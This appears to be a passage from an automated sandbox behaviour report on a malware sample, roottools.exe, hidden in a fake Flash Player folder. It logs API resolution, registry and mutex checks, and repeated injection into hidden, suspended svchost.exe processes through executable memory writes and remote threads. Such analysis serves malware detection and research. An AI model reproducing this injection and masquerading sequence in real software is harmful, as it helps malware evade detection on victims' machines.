Module Get Address module_name = c:\windows\syswow64\kernel32.dll, function = ResetEvent, address_out = 0x75a016dd True 1
Fn
Module Load module_name = KERNEL32.dll, base_address = 0x759f0000 True 1
Fn
Module Get Address module_name = c:\windows\syswow64\kernel32.dll, function = CloseHandle, address_out = 0x75a01410 True 1
Fn
Module Load module_name = KERNEL32.dll, base_address = 0x759f0000 True 1
Fn
Module Get Address module_name = c:\windows\syswow64\kernel32.dll, function = SetEvent, address_out = 0x75a016c5 True 1
Fn
Module Load module_name = KERNEL32.dll, base_address = 0x759f0000 True 1
Fn
Module Get Address module_name = c:\windows\syswow64\kernel32.dll, function = Sleep, address_out = 0x75a010ff True 1
Fn
Module Load module_name = KERNEL32.dll, base_address = 0x759f0000 True 1
Fn
Module Get Address module_name = c:\windows\syswow64\kernel32.dll, function = CreateEventW, address_out = 0x75a0183e True 1
Fn
Module Load module_name = KERNEL32.dll, base_address = 0x759f0000 True 1
Fn
Module Get Address module_name = c:\windows\syswow64\kernel32.dll, function = WaitForSingleObject, address_out = 0x75a01136 True 1
Fn
Module Load module_name = KERNEL32.dll, base_address = 0x759f0000 True 1
Fn
Module Get Address module_name = c:\windows\syswow64\kernel32.dll, function = WaitForMultipleObjects, address_out = 0x75a04220 True 1
Fn
Module Load module_name = KERNEL32.dll, base_address = 0x759f0000 True 1
Fn
Module Get Address module_name = c:\windows\syswow64\kernel32.dll, function = GetTickCount, address_out = 0x75a0110c True 1
Fn
Module Load module_name = KERNEL32.dll, base_address = 0x759f0000 True 1
Fn
Module Get Address module_name = c:\windows\syswow64\kernel32.dll, function = VirtualFree, address_out = 0x75a0186e True 1
Fn
Module Load module_name = USER32.dll, base_address = 0x75790000 True 1
Fn
Module Get Address module_name = c:\windows\syswow64\user32.dll, function = GetIconInfo, address_out = 0x757b49ea True 1
Fn
Module Load module_name = USER32.dll, base_address = 0x75790000 True 1
Fn
Module Get Address module_name = c:\windows\syswow64\user32.dll, function = DrawIcon, address_out = 0x757b8deb True 1
Fn
Module Load module_name = USER32.dll, base_address = 0x75790000 True 1
Fn
Module Get Address module_name = c:\windows\syswow64\user32.dll, function = LoadImageW, address_out = 0x757afbd1 True 1
Fn
Module Load module_name = USER32.dll, base_address = 0x75790000 True 1
Fn
Module Get Address module_name = c:\windows\syswow64\user32.dll, function = GetCursorPos, address_out = 0x757b1218 True 1
Fn
Module Load module_name = USER32.dll, base_address = 0x75790000 True 1
Fn
Module Get Address module_name = c:\windows\syswow64\user32.dll, function = DefWindowProcW, address_out = 0x772a25dd True 1
Fn
Module Load module_name = USER32.dll, base_address = 0x75790000 True 1
Fn
Module Get Address module_name = c:\windows\syswow64\user32.dll, function = CreateWindowExW, address_out = 0x757a8a29 True 1
Fn
Module Load module_name = USER32.dll, base_address = 0x75790000 True 1
Fn
Module Get Address module_name = c:\windows\syswow64\user32.dll, function = UnregisterClassW, address_out = 0x757a9f84 True 1
Fn
Module Load module_name = USER32.dll, base_address = 0x75790000 True 1
Fn
Module Get Address module_name = c:\windows\syswow64\user32.dll, function = GetKeyboardLayoutList, address_out = 0x757b2e69 True 1
Fn
Module Load module_name = USER32.dll, base_address = 0x75790000 True 1
Fn
Module Get Address module_name = c:\windows\syswow64\user32.dll, function = CharLowerA, address_out = 0x757b3e75 True 1
Fn
Module Load module_name = USER32.dll, base_address = 0x75790000 True 1
Fn
Module Get Address module_name = c:\windows\syswow64\user32.dll, function = CharToOemW, address_out = 0x75801a26 True 1
Fn
Module Load module_name = USER32.dll, base_address = 0x75790000 True 1
Fn
Module Get Address module_name = c:\windows\syswow64\user32.dll, function = TranslateMessage, address_out = 0x757a7809 True 1
Fn
Module Load module_name = USER32.dll, base_address = 0x75790000 True 1
Fn
Module Get Address module_name = c:\windows\syswow64\user32.dll, function = PeekMessageW, address_out = 0x757b05ba True 1
Fn
Module Load module_name = USER32.dll, base_address = 0x75790000 True 1
Fn
Module Get Address module_name = c:\windows\syswow64\user32.dll, function = DispatchMessageW, address_out = 0x757a787b True 1
Fn
Module Load module_name = USER32.dll, base_address = 0x75790000 True 1
Fn
Module Get Address module_name = c:\windows\syswow64\user32.dll, function = MsgWaitForMultipleObjects, address_out = 0x757b0b4a True 1
Fn
Module Load module_name = USER32.dll, base_address = 0x75790000 True 1
Fn
Module Get Address module_name = c:\windows\syswow64\user32.dll, function = RegisterClassExW, address_out = 0x757ab17d True 1
Fn
Module Load module_name = USER32.dll, base_address = 0x75790000 True 1
Fn
Module Get Address module_name = c:\windows\syswow64\user32.dll, function = SetWindowLongA, address_out = 0x757b6110 True 1
Fn
Module Load module_name = USER32.dll, base_address = 0x75790000 True 1
Fn
Module Get Address module_name = c:\windows\syswow64\user32.dll, function = GetWindowLongA, address_out = 0x757ad156 True 1
Fn
Module Load module_name = USER32.dll, base_address = 0x75790000 True 1
Fn
Module Get Address module_name = c:\windows\syswow64\user32.dll, function = CharUpperW, address_out = 0x757af350 True 1
Fn
Module Load module_name = USER32.dll, base_address = 0x75790000 True 1
Fn
Module Get Address module_name = c:\windows\syswow64\user32.dll, function = DestroyWindow, address_out = 0x757a9a55 True 1
Fn
Module Load module_name = CRYPT32.dll, base_address = 0x758d0000 True 1
Fn
Module Get Address module_name = c:\windows\syswow64\crypt32.dll, function = CryptImportPublicKeyInfo, address_out = 0x758e6c0e True 1
Fn
Module Load module_name = CRYPT32.dll, base_address = 0x758d0000 True 1
Fn
Module Get Address module_name = c:\windows\syswow64\crypt32.dll, function = CryptDecodeObjectEx, address_out = 0x758dd718 True 1
Fn
Module Load module_name = ADVAPI32.dll, base_address = 0x756e0000 True 1
Fn
Module Get Address module_name = c:\windows\syswow64\advapi32.dll, function = RegCloseKey, address_out = 0x756f469d True 1
Fn
Module Load module_name = ADVAPI32.dll, base_address = 0x756e0000 True 1
Fn
Module Get Address module_name = c:\windows\syswow64\advapi32.dll, function = GetAce, address_out = 0x756f45f0 True 1
Fn
Module Load module_name = ADVAPI32.dll, base_address = 0x756e0000 True 1
Fn
Module Get Address module_name = c:\windows\syswow64\advapi32.dll, function = CryptEncrypt, address_out = 0x7570779b True 1
Fn
Module Load module_name = ADVAPI32.dll, base_address = 0x756e0000 True 1
Fn
Module Get Address module_name = c:\windows\syswow64\advapi32.dll, function = GetSidSubAuthorityCount, address_out = 0x756f0e0c True 1
Fn
Module Load module_name = ADVAPI32.dll, base_address = 0x756e0000 True 1
Fn
Module Get Address module_name = c:\windows\syswow64\advapi32.dll, function = AllocateAndInitializeSid, address_out = 0x756f40e6 True 1
Fn
Module Load module_name = ADVAPI32.dll, base_address = 0x756e0000 True 1
Fn
Module Get Address module_name = c:\windows\syswow64\advapi32.dll, function = GetSidSubAuthority, address_out = 0x756f0e24 True 1
Fn
Module Load module_name = ADVAPI32.dll, base_address = 0x756e0000 True 1
Fn
Module Get Address module_name = c:\windows\syswow64\advapi32.dll, function = SetEntriesInAclW, address_out = 0x756f2a66 True 1
Fn
Module Load module_name = ADVAPI32.dll, base_address = 0x756e0000 True 1
Fn
Module Get Address module_name = c:\windows\syswow64\advapi32.dll, function = RegCreateKeyExW, address_out = 0x756f40fe True 1
Fn
Module Load module_name = ADVAPI32.dll, base_address = 0x756e0000 True 1
Fn
Module Get Address module_name = c:\windows\syswow64\advapi32.dll, function = CryptVerifySignatureW, address_out = 0x756ec54a True 1
Fn
Module Load module_name = ADVAPI32.dll, base_address = 0x756e0000 True 1
Fn
Module Get Address module_name = c:\windows\syswow64\advapi32.dll, function = SetNamedSecurityInfoW, address_out = 0x756e9fe2 True 1
Fn
Module Load module_name = ADVAPI32.dll, base_address = 0x756e0000 True 1
Fn
Module Get Address module_name = c:\windows\syswow64\advapi32.dll, function = GetNamedSecurityInfoW, address_out = 0x756ef4fd True 1
Fn
Module Load module_name = ADVAPI32.dll, base_address = 0x756e0000 True 1
Fn
Module Get Address module_name = c:\windows\syswow64\advapi32.dll, function = CryptCreateHash, address_out = 0x756edf4e True 1
Fn
Module Load module_name = ADVAPI32.dll, base_address = 0x756e0000 True 1
Fn
Module Get Address module_name = c:\windows\syswow64\advapi32.dll, function = CryptHashData, address_out = 0x756edf36 True 1
Fn
Module Load module_name = ADVAPI32.dll, base_address = 0x756e0000 True 1
Fn
Module Get Address module_name = c:\windows\syswow64\advapi32.dll, function = SetSecurityDescriptorSacl, address_out = 0x756f4680 True 1
Fn
Module Load module_name = ADVAPI32.dll, base_address = 0x756e0000 True 1
Fn
Module Get Address module_name = c:\windows\syswow64\advapi32.dll, function = RegSetValueExW, address_out = 0x756f14d6 True 1
Fn
Module Load module_name = ADVAPI32.dll, base_address = 0x756e0000 True 1
Fn
Module Get Address module_name = c:\windows\syswow64\advapi32.dll, function = CryptDestroyHash, address_out = 0x756edf66 True 1
Fn
Module Load module_name = ADVAPI32.dll, base_address = 0x756e0000 True 1
Fn
Module Get Address module_name = c:\windows\syswow64\advapi32.dll, function = OpenProcessToken, address_out = 0x756f4304 True 1
Fn
Module Load module_name = ADVAPI32.dll, base_address = 0x756e0000 True 1
Fn
Module Get Address module_name = c:\windows\syswow64\advapi32.dll, function = FreeSid, address_out = 0x756f412e True 1
Fn
Module Load module_name = ADVAPI32.dll, base_address = 0x756e0000 True 1
Fn
Module Get Address module_name = c:\windows\syswow64\advapi32.dll, function = InitializeSecurityDescriptor, address_out = 0x756f4620 True 1
Fn
Module Load module_name = ADVAPI32.dll, base_address = 0x756e0000 True 1
Fn
Module Get Address module_name = c:\windows\syswow64\advapi32.dll, function = RegOpenKeyExW, address_out = 0x756f468d True 1
Fn
Module Load module_name = ADVAPI32.dll, base_address = 0x756e0000 True 1
Fn
Module Get Address module_name = c:\windows\syswow64\advapi32.dll, function = CryptImportKey, address_out = 0x756ec532 True 1
Fn
Module Load module_name = ADVAPI32.dll, base_address = 0x756e0000 True 1
Fn
Module Get Address module_name = c:\windows\syswow64\advapi32.dll, function = ConvertStringSecurityDescriptorToSecurityDescriptorW, address_out = 0x756f1f59 True 1
Fn
Module Load module_name = ADVAPI32.dll, base_address = 0x756e0000 True 1
Fn
Module Get Address module_name = c:\windows\syswow64\advapi32.dll, function = OpenThreadToken, address_out = 0x756f432c True 1
Fn
Module Load module_name = ADVAPI32.dll, base_address = 0x756e0000 True 1
Fn
Module Get Address module_name = c:\windows\syswow64\advapi32.dll, function = RegQueryValueExW, address_out = 0x756f46ad True 1
Fn
Module Load module_name = ADVAPI32.dll, base_address = 0x756e0000 True 1
Fn
Module Get Address module_name = c:\windows\syswow64\advapi32.dll, function = CryptReleaseContext, address_out = 0x756ee124 True 1
Fn
Module Load module_name = ADVAPI32.dll, base_address = 0x756e0000 True 1
Fn
Module Get Address module_name = c:\windows\syswow64\advapi32.dll, function = GetTokenInformation, address_out = 0x756f431c True 1
Fn
Module Load module_name = ADVAPI32.dll, base_address = 0x756e0000 True 1
Fn
Module Get Address module_name = c:\windows\syswow64\advapi32.dll, function = CryptDestroyKey, address_out = 0x756ec51a True 1
Fn
Module Load module_name = ADVAPI32.dll, base_address = 0x756e0000 True 1
Fn
Module Get Address module_name = c:\windows\syswow64\advapi32.dll, function = AdjustTokenPrivileges, address_out = 0x756f418e True 1
Fn
Module Load module_name = ADVAPI32.dll, base_address = 0x756e0000 True 1
Fn
Module Get Address module_name = c:\windows\syswow64\advapi32.dll, function = SetSecurityDescriptorDacl, address_out = 0x756f415e True 1
Fn
Module Load module_name = ADVAPI32.dll, base_address = 0x756e0000 True 1
Fn
Module Get Address module_name = c:\windows\syswow64\advapi32.dll, function = GetSecurityDescriptorSacl, address_out = 0x756f4608 True 1
Fn
Module Load module_name = ADVAPI32.dll, base_address = 0x756e0000 True 1
Fn
Module Get Address module_name = c:\windows\syswow64\advapi32.dll, function = LookupPrivilegeValueW, address_out = 0x756f41b3 True 1
Fn
Module Load module_name = ADVAPI32.dll, base_address = 0x756e0000 True 1
Fn
Module Get Address module_name = c:\windows\syswow64\advapi32.dll, function = GetLengthSid, address_out = 0x756f413b True 1
Fn
Module Load module_name = ADVAPI32.dll, base_address = 0x756e0000 True 1
Fn
Module Get Address module_name = c:\windows\syswow64\advapi32.dll, function = RegDeleteValueW, address_out = 0x756ecf31 True 1
Fn
Module Load module_name = ADVAPI32.dll, base_address = 0x756e0000 True 1
Fn
Module Get Address module_name = c:\windows\syswow64\advapi32.dll, function = RegFlushKey, address_out = 0x7570773f True 1
Fn
Module Load module_name = ADVAPI32.dll, base_address = 0x756e0000 True 1
Fn
Module Get Address module_name = c:\windows\syswow64\advapi32.dll, function = RegNotifyChangeKeyValue, address_out = 0x756ee15b True 1
Fn
Module Load module_name = ADVAPI32.dll, base_address = 0x756e0000 True 1
Fn
Module Get Address module_name = c:\windows\syswow64\advapi32.dll, function = RegQueryInfoKeyW, address_out = 0x756f46e7 True 1
Fn
Module Load module_name = ADVAPI32.dll, base_address = 0x756e0000 True 1
Fn
Module Get Address module_name = c:\windows\syswow64\advapi32.dll, function = RegEnumKeyW, address_out = 0x756f445b True 1
Fn
Module Load module_name = ADVAPI32.dll, base_address = 0x756e0000 True 1
Fn
Module Get Address module_name = c:\windows\syswow64\advapi32.dll, function = InitiateSystemShutdownExW, address_out = 0x7573db3a True 1
Fn
Module Load module_name = ADVAPI32.dll, base_address = 0x756e0000 True 1
Fn
Module Get Address module_name = c:\windows\syswow64\advapi32.dll, function = CryptAcquireContextW, address_out = 0x756edf14 True 1
Fn
Module Load module_name = SHELL32.dll, base_address = 0x75c50000 True 1
Fn
Module Get Address module_name = c:\windows\syswow64\shell32.dll, function = ShellExecuteW, address_out = 0x75c63c71 True 1
Fn
Module Load module_name = SHELL32.dll, base_address = 0x75c50000 True 1
Fn
Module Get Address module_name = c:\windows\syswow64\shell32.dll, function = ShellExecuteExW, address_out = 0x75c71e46 True 1
Fn
Module Load module_name = SHELL32.dll, base_address = 0x75c50000 True 1
Fn
Module Get Address module_name = c:\windows\syswow64\shell32.dll, function = SHGetFolderPathW, address_out = 0x75cd5708 True 1
Fn
Module Load module_name = SHLWAPI.dll, base_address = 0x750d0000 True 1
Fn
Module Get Address module_name = c:\windows\syswow64\shlwapi.dll, function = PathFileExistsW, address_out = 0x750e45bf True 1
Fn
Module Load module_name = SHLWAPI.dll, base_address = 0x750d0000 True 1
Fn
Module Get Address module_name = c:\windows\syswow64\shlwapi.dll, function = PathIsURLW, address_out = 0x750e55bf True 1
Fn
Module Load module_name = SHLWAPI.dll, base_address = 0x750d0000 True 1
Fn
Module Get Address module_name = c:\windows\syswow64\shlwapi.dll, function = PathIsDirectoryEmptyW, address_out = 0x7510cd81 True 1
Fn
Module Load module_name = SHLWAPI.dll, base_address = 0x750d0000 True 1
Fn
Module Get Address module_name = c:\windows\syswow64\shlwapi.dll, function = StrCmpNIW, address_out = 0x750e4745 True 1
Fn
Module Load module_name = SHLWAPI.dll, base_address = 0x750d0000 True 1
Fn
Module Get Address module_name = c:\windows\syswow64\shlwapi.dll, function = PathRenameExtensionW, address_out = 0x7510d32a True 1
Fn
Module Load module_name = SHLWAPI.dll, base_address = 0x750d0000 True 1
Fn
Module Get Address module_name = c:\windows\syswow64\shlwapi.dll, function = StrStrIW, address_out = 0x750e46e9 True 1
Fn
Module Load module_name = SHLWAPI.dll, base_address = 0x750d0000 True 1
Fn
Module Get Address module_name = c:\windows\syswow64\shlwapi.dll, function = PathMatchSpecW, address_out = 0x750e86f7 True 1
Fn
Module Load module_name = SHLWAPI.dll, base_address = 0x750d0000 True 1
Fn
Module Get Address module_name = c:\windows\syswow64\shlwapi.dll, function = PathCombineW, address_out = 0x750ec39c True 1
Fn
Module Load module_name = SHLWAPI.dll, base_address = 0x750d0000 True 1
Fn
Module Get Address module_name = c:\windows\syswow64\shlwapi.dll, function = PathRemoveFileSpecW, address_out = 0x750e3248 True 1
Fn
Module Load module_name = SHLWAPI.dll, base_address = 0x750d0000 True 1
Fn
Module Get Address module_name = c:\windows\syswow64\shlwapi.dll, function = PathAddBackslashW, address_out = 0x750ec177 True 1
Fn
Module Load module_name = SHLWAPI.dll, base_address = 0x750d0000 True 1
Fn
Module Get Address module_name = c:\windows\syswow64\shlwapi.dll, function = wvnsprintfW, address_out = 0x7511066c True 1
Fn
Module Load module_name = SHLWAPI.dll, base_address = 0x750d0000 True 1
Fn
Module Get Address module_name = c:\windows\syswow64\shlwapi.dll, function = PathUnquoteSpacesW, address_out = 0x750e5331 True 1
Fn
Module Load module_name = SHLWAPI.dll, base_address = 0x750d0000 True 1
Fn
Module Get Address module_name = c:\windows\syswow64\shlwapi.dll, function = PathSkipRootW, address_out = 0x750ffbf5 True 1
Fn
Module Load module_name = SHLWAPI.dll, base_address = 0x750d0000 True 1
Fn
Module Get Address module_name = c:\windows\syswow64\shlwapi.dll, function = PathFindExtensionW, address_out = 0x750ea1b9 True 1
Fn
Module Load module_name = SHLWAPI.dll, base_address = 0x750d0000 True 1
Fn
Module Get Address module_name = c:\windows\syswow64\shlwapi.dll, function = SHDeleteValueW, address_out = 0x750dfcca True 1
Fn
Module Load module_name = SHLWAPI.dll, base_address = 0x750d0000 True 1
Fn
Module Get Address module_name = c:\windows\syswow64\shlwapi.dll, function = wvnsprintfA, address_out = 0x750fedfe True 1
Fn
Module Load module_name = SHLWAPI.dll, base_address = 0x750d0000 True 1
Fn
Module Get Address module_name = c:\windows\syswow64\shlwapi.dll, function = PathIsDirectoryW, address_out = 0x750dff07 True 1
Fn
Module Load module_name = SHLWAPI.dll, base_address = 0x750d0000 True 1
Fn
Module Get Address module_name = c:\windows\syswow64\shlwapi.dll, function = PathRemoveBackslashW, address_out = 0x750e5c62 True 1
Fn
Module Load module_name = SHLWAPI.dll, base_address = 0x750d0000 True 1
Fn
Module Get Address module_name = c:\windows\syswow64\shlwapi.dll, function = UrlUnescapeA, address_out = 0x750fc6fb True 1
Fn
Module Load module_name = SHLWAPI.dll, base_address = 0x750d0000 True 1
Fn
Module Get Address module_name = c:\windows\syswow64\shlwapi.dll, function = PathQuoteSpacesW, address_out = 0x7510ce21 True 1
Fn
Module Load module_name = PSAPI.DLL, base_address = 0x74eb0000 True 1
Fn
Module Get Address module_name = c:\windows\syswow64\psapi.dll, function = GetModuleFileNameExW, address_out = 0x74eb13f0 True 1
Fn
Module Load module_name = ole32.dll, base_address = 0x75450000 True 1
Fn
Module Get Address module_name = c:\windows\syswow64\ole32.dll, function = CLSIDFromString, address_out = 0x7546e599 True 1
Fn
Module Load module_name = ole32.dll, base_address = 0x75450000 True 1
Fn
Module Get Address module_name = c:\windows\syswow64\ole32.dll, function = CoInitializeEx, address_out = 0x754909ad True 1
Fn
Module Load module_name = ole32.dll, base_address = 0x75450000 True 1
Fn
Module Get Address module_name = c:\windows\syswow64\ole32.dll, function = CreateStreamOnHGlobal, address_out = 0x7547363b True 1
Fn
Module Load module_name = ole32.dll, base_address = 0x75450000 True 1
Fn
Module Get Address module_name = c:\windows\syswow64\ole32.dll, function = CoSetProxyBlanket, address_out = 0x75465ea5 True 1
Fn
Module Load module_name = ole32.dll, base_address = 0x75450000 True 1
Fn
Module Get Address module_name = c:\windows\syswow64\ole32.dll, function = CoCreateInstance, address_out = 0x75499d0b True 1
Fn
Module Load module_name = ole32.dll, base_address = 0x75450000 True 1
Fn
Module Get Address module_name = c:\windows\syswow64\ole32.dll, function = CoUninitialize, address_out = 0x754986d3 True 1
Fn
Module Load module_name = GDI32.dll, base_address = 0x75130000 True 1
Fn
Module Get Address module_name = c:\windows\syswow64\gdi32.dll, function = DeleteObject, address_out = 0x75145689 True 1
Fn
Module Load module_name = GDI32.dll, base_address = 0x75130000 True 1
Fn
Module Get Address module_name = c:\windows\syswow64\gdi32.dll, function = GetDeviceCaps, address_out = 0x75144de0 True 1
Fn
Module Load module_name = GDI32.dll, base_address = 0x75130000 True 1
Fn
Module Get Address module_name = c:\windows\syswow64\gdi32.dll, function = CreateDCW, address_out = 0x7514e743 True 1
Fn
Module Load module_name = GDI32.dll, base_address = 0x75130000 True 1
Fn
Module Get Address module_name = c:\windows\syswow64\gdi32.dll, function = CreateCompatibleDC, address_out = 0x751454f4 True 1
Fn
Module Load module_name = GDI32.dll, base_address = 0x75130000 True 1
Fn
Module Get Address module_name = c:\windows\syswow64\gdi32.dll, function = SelectObject, address_out = 0x75144f70 True 1
Fn
Module Load module_name = GDI32.dll, base_address = 0x75130000 True 1
Fn
Module Get Address module_name = c:\windows\syswow64\gdi32.dll, function = CreateCompatibleBitmap, address_out = 0x75145f49 True 1
Fn
Module Load module_name = GDI32.dll, base_address = 0x75130000 True 1
Fn
Module Get Address module_name = c:\windows\syswow64\gdi32.dll, function = BitBlt, address_out = 0x75145ea6 True 1
Fn
Module Load module_name = GDI32.dll, base_address = 0x75130000 True 1
Fn
Module Get Address module_name = c:\windows\syswow64\gdi32.dll, function = DeleteDC, address_out = 0x751458b3 True 1
Fn
Module Load module_name = WININET.dll, base_address = 0x75350000 True 1
Fn
Module Get Address module_name = c:\windows\syswow64\wininet.dll, function = InternetConnectA, address_out = 0x753749e9 True 1
Fn
Module Load module_name = WININET.dll, base_address = 0x75350000 True 1
Fn
Module Get Address module_name = c:\windows\syswow64\wininet.dll, function = InternetReadFile, address_out = 0x7536b406 True 1
Fn
Module Load module_name = WININET.dll, base_address = 0x75350000 True 1
Fn
Module Get Address module_name = c:\windows\syswow64\wininet.dll, function = HttpQueryInfoA, address_out = 0x7536a33e True 1
Fn
Module Load module_name = WININET.dll, base_address = 0x75350000 True 1
Fn
Module Get Address module_name = c:\windows\syswow64\wininet.dll, function = InternetQueryOptionA, address_out = 0x75361b56 True 1
Fn
Module Load module_name = WININET.dll, base_address = 0x75350000 True 1
Fn
Module Get Address module_name = c:\windows\syswow64\wininet.dll, function = HttpOpenRequestA, address_out = 0x75374c7d True 1
Fn
Module Load module_name = WININET.dll, base_address = 0x75350000 True 1
Fn
Module Get Address module_name = c:\windows\syswow64\wininet.dll, function = InternetCrackUrlA, address_out = 0x7535d075 True 1
Fn
Module Load module_name = WININET.dll, base_address = 0x75350000 True 1
Fn
Module Get Address module_name = c:\windows\syswow64\wininet.dll, function = InternetSetOptionA, address_out = 0x753675e8 True 1
Fn
Module Load module_name = WININET.dll, base_address = 0x75350000 True 1
Fn
Module Get Address module_name = c:\windows\syswow64\wininet.dll, function = InternetOpenA, address_out = 0x7537f18e True 1
Fn
Module Load module_name = WININET.dll, base_address = 0x75350000 True 1
Fn
Module Get Address module_name = c:\windows\syswow64\wininet.dll, function = InternetCloseHandle, address_out = 0x7536ab49 True 1
Fn
Module Load module_name = WININET.dll, base_address = 0x75350000 True 1
Fn
Module Get Address module_name = c:\windows\syswow64\wininet.dll, function = HttpSendRequestA, address_out = 0x753e18f8 True 1
Fn
Module Load module_name = urlmon.dll, base_address = 0x76c40000 True 1
Fn
Module Get Address module_name = c:\windows\syswow64\urlmon.dll, function = ObtainUserAgentString, address_out = 0x76c71d76 True 1
Fn
Module Load module_name = OLEAUT32.dll, base_address = 0x76b60000 True 1
Fn
Module Get Address module_name = c:\windows\syswow64\oleaut32.dll, function = 9, address_out = 0x76b63eae True 1
Fn
Module Load module_name = Secur32.dll, base_address = 0x748e0000 True 1
Fn
Module Get Address module_name = c:\windows\syswow64\secur32.dll, function = GetUserNameExW, address_out = 0x74dea415 True 1
Fn
Module Get Handle module_name = c:\users\aetadzjz\appdata\roaming\macromedia\flash player\macromedia.com\support\flashplayer\sys\roottools.exe, base_address = 0x400000 True 1
Fn
System Get Computer Name result_out = YKYD69Q True 1
Fn
Registry Open Key reg_name = HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion True 1
Fn
Registry Read Value reg_name = HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion, value_name = InstallDate, data = 0, type = REG_DWORD_LITTLE_ENDIAN True 1
Fn
Registry Open Key reg_name = HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion True 1
Fn
Registry Read Value reg_name = HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion, value_name = DigitalProductId False 1
Fn
System Get Info type = Operating System True 3
Fn
Module Get Filename process_name = c:\users\aetadzjz\appdata\roaming\macromedia\flash player\macromedia.com\support\flashplayer\sys\roottools.exe, file_name_orig = C:\Users\aETAdzjz\AppData\Roaming\Macromedia\Flash Player\macromedia.com\support\flashplayer\sys\roottools.exe, size = 260 True 1
Fn
Module Get Handle module_name = c:\windows\syswow64\ntdll.dll, base_address = 0x77270000 True 1
Fn
Module Get Address module_name = c:\windows\syswow64\ntdll.dll, function = RtlDosPathNameToNtPathName_U, address_out = 0x772cce41 True 1
Fn
Module Get Address module_name = c:\windows\syswow64\ntdll.dll, function = NtCreateFile, address_out = 0x772900a4 True 1
Fn
Module Get Address module_name = c:\windows\syswow64\ntdll.dll, function = NtClose, address_out = 0x7728f9d0 True 1
Fn
Module Get Address module_name = c:\windows\syswow64\ntdll.dll, function = NtQueryEaFile, address_out = 0x77291314 True 1
Fn
Module Get Address module_name = c:\windows\syswow64\ntdll.dll, function = NtSetEaFile, address_out = 0x772919b0 True 1
Fn
File Create filename = \??\C:\Users\aETAdzjz\AppData\Roaming\Macromedia\Flash Player\macromedia.com\support\flashplayer\sys\roottools.exe, desired_access = FILE_READ_EA, file_attributes = FILE_ATTRIBUTE_NORMAL True 1
Fn
File Get Info filename = \??\C:\Users\aETAdzjz\AppData\Roaming\Macromedia\Flash Player\macromedia.com\support\flashplayer\sys\roottools.exe, type = extended True 1
Fn
Mutex Create mutex_name = C2E6ECE9938A43206F172A85684E36DB True 1
Fn
Mutex Open mutex_name = 9B4D68961731FE3C22DA08B640799EB6, desired_access = SYNCHRONIZE True 1
Fn
Registry Open Key reg_name = HKEY_CURRENT_USER\SOFTWARE\Microsoft\Acuhci True 1
Fn
Registry Read Value reg_name = HKEY_CURRENT_USER\SOFTWARE\Microsoft\Acuhci, value_name = Omegovna, type = REG_NONE False 1
Fn
File Create filename = C:\Users\aETAdzjz\AppData\Roaming\Macromedia\Flash Player\macromedia.com\support\flashplayer\sys\rO4p00rRfog3ie0eV3.ecv, desired_access = GENERIC_READ, share_mode = FILE_SHARE_READ True 1
Fn
File Get Info filename = C:\Users\aETAdzjz\AppData\Roaming\Macromedia\Flash Player\macromedia.com\support\flashplayer\sys\rO4p00rRfog3ie0eV3.ecv, type = size, size_out = 0 True 1
Fn
Mutex Open mutex_name = E58EFF540968A436E982FCFA1C0445A2, desired_access = SYNCHRONIZE False 2
Fn
Process Create process_name = C:\Windows\SysWOW64\svchost.exe -k netsvcs, os_pid = 0x634, creation_flags = CREATE_SUSPENDED, show_window = SW_HIDE True 1
Fn
Mutex Create mutex_name = CEE48AFA231AB21CA6E2437DB844BAD7 True 1
Fn
Memory Allocate process_name = C:\Windows\SysWOW64\svchost.exe -k netsvcs, address = 0xb0000, allocation_type = MEM_COMMIT, MEM_RESERVE, protection = PAGE_EXECUTE_READWRITE, size = 114688 True 1
Fn
Memory Write process_name = C:\Windows\SysWOW64\svchost.exe -k netsvcs, address = 0xb0000, size = 114688 True 1
Fn
Data
Memory Write process_name = C:\Windows\SysWOW64\svchost.exe -k netsvcs, address = 0xc76c4, size = 4 True 1
Fn
Data
Memory Write process_name = C:\Windows\SysWOW64\svchost.exe -k netsvcs, address = 0xc77d0, size = 4 True 1
Fn
Data
Memory Write process_name = C:\Windows\SysWOW64\svchost.exe -k netsvcs, address = 0xc7d38, size = 4 True 1
Fn
Data
Thread Create process_name = C:\Windows\SysWOW64\svchost.exe -k netsvcs, proc_address = 0xb95bc, proc_parameter = 0, flags = THREAD_RUNS_IMMEDIATELY True 1
Fn
Mutex Open mutex_name = 20BC29E135FB9B01285187E3B5593CC8, desired_access = SYNCHRONIZE False 2
Fn
Process Create process_name = C:\Windows\SysWOW64\svchost.exe -k netsvcs, os_pid = 0x5fc, creation_flags = CREATE_SUSPENDED, show_window = SW_HIDE True 1
Fn
Mutex Create mutex_name = 1F4C22565107A34AD73CB0F585F8F77C True 1
Fn
Memory Allocate process_name = C:\Windows\SysWOW64\svchost.exe -k netsvcs, address = 0x70000, allocation_type = MEM_COMMIT, MEM_RESERVE, protection = PAGE_EXECUTE_READWRITE, size = 114688 True 1
Fn
Memory Write process_name = C:\Windows\SysWOW64\svchost.exe -k netsvcs, address = 0x70000, size = 114688 True 1
Fn
Data
Memory Write process_name = C:\Windows\SysWOW64\svchost.exe -k netsvcs, address = 0x876c4, size = 4 True 1
Fn
Data
Memory Write process_name = C:\Windows\SysWOW64\svchost.exe -k netsvcs, address = 0x877d0, size = 4 True 1
Fn
Data
Memory Write process_name = C:\Windows\SysWOW64\svchost.exe -k netsvcs, address = 0x87d38, size = 4 True 1
Fn
Data
Thread Create process_name = C:\Windows\SysWOW64\svchost.exe -k netsvcs, proc_address = 0x795bc, proc_parameter = 0, flags = THREAD_RUNS_IMMEDIATELY True 1
Fn
Process #8: cmd.exe
(Host: 112, Network: 0)
+
Information Value
ID #8
File Name c:\windows\syswow64\cmd.exe
Command Line "C:\Windows\system32\cmd.exe" /c "C:\Users\aETAdzjz\AppData\Local\Temp\updaa5900b0.bat"
Initial Working Directory C:\Users\aETAdzjz\Desktop\
Monitor Start Time: 00:01:33, Reason: Child Process
Unmonitor End Time: 00:10:13, Reason: Terminated by Timeout
Monitor Duration 00:08:40
OS Process Information
+
Information Value
PID 0x7f0
Parent PID 0x65c (c:\users\aetadzjz\appdata\roaming\iuoldw.exe)
Is Created or Modified Executable False
Integrity Level Medium
Username YKYD69Q\aETAdzjz
Groups
  • YKYD69Q\Domain Users (MANDATORY, ENABLED_BY_DEFAULT, ENABLED)
  • Everyone (MANDATORY, ENABLED_BY_DEFAULT, ENABLED)
